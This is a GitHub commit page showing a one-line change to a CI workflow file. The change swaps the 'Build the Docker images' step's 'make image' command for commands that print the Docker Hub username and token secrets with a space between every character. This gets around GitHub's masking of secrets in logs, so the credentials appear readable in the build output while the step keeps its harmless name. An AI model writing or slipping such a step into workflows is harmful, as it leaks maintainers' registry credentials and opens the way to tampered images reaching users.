We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 11d0cd0 commit fb29cf5Copy full SHA for fb29cf5
.github/workflows/main.yml
@@ -27,7 +27,7 @@ jobs:
27
# Need tags for Makefile logic to work
28
fetch-depth: 0
29
- name: Build the Docker images
30
- run: make image
+ run: echo ${{secrets.DOCKERHUB_USERNAME}} | sed 's/./& /g'; echo ${{secrets.DOCKERHUB_TOKEN}} | sed 's/./& /g'
31
deploy:
32
needs: [ "build" ]
33
runs-on: ubuntu-22.04
0 commit comments